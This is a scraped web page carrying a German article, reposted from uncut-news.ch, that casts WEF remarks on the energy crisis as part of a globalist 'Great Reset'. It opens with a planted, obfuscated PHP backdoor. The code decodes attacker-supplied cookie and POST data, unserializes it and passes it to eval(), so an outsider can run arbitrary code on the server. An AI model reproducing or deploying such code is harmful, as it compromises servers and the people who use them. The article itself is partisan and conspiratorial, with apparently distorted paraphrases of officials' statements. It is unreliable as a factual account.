$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Die Eliten von Davos warnen die Länder davor, sich dem „schmerzhaften globalen Wandel“ zu widersetzen – uncut-news.ch – No-Zensur.de Das freie Wort für eine freie Welt
Start Uncutnews.ch Die Eliten von Davos warnen die Länder davor, sich dem „schmerzhaften globalen Wandel“ zu widersetzen – uncut-news.ch

Die Eliten von Davos warnen die Länder davor, sich dem „schmerzhaften globalen Wandel“ zu widersetzen – uncut-news.ch

0
Die Eliten von Davos warnen die Länder davor, sich dem „schmerzhaften globalen Wandel“ zu widersetzen – uncut-news.ch


Die Eliten von Davos erklärten, die globale Energiekrise sei ein „Übergang“, der für die meisten „schmerzhaft“ sein werde, dem sich die Länder, die ihre eigene Souveränität bewahren wollen, aber nicht widersetzen sollten.

In seiner Rede auf dem Weltwirtschaftsforum zur Energiekrise warnte der deutsche Vizekanzler Robert Habeck die Regierungen davor, ihre eigenen Bürger zu schützen und stattdessen den Regeln des Marktes zu folgen.

Mit anderen Worten: Die Länder sollten sich die Great Reset-Agenda der Globalisten zu eigen machen.

Während einer Podiumsdiskussion des Weltwirtschaftsforums zur Energiekrise sagte der deutsche Vizekanzler Robert Habeck, die Länder sollten der Versuchung widerstehen, zuerst ihre eigenen Interessen zu verfolgen. Er fügte hinzu, Nachhaltigkeit erfordere eine Änderung der „Herrschaft der Märkte“.

In einer anderen Sitzung bezeichnete Kjerstin Braathen, die Geschäftsführerin des größten norwegischen Finanzinstituts, das Chaos auf dem Energiemarkt als „Übergang“. Sie fügte hinzu, dass es in Zukunft zu großen Engpässen und wirtschaftlichen Schwierigkeiten kommen wird, aber dass „der Schmerz es wert ist“.

Die norwegische Finanzchefin Kjerstin Braathen sprach in Davos über kleine und mittlere Unternehmen und sagte, dass die Energiewende zu Energieengpässen und Inflationsdruck führen wird, aber diese „Schmerzen“ seien es „wert“.

Interessanterweise benutzte US-Präsident Joe Biden genau die gleichen Worte wie die Eliten von Davos. Er sagte, dass wir angesichts der Benzinpreise einen „unglaublichen Wandel“ durchmachen.





Source link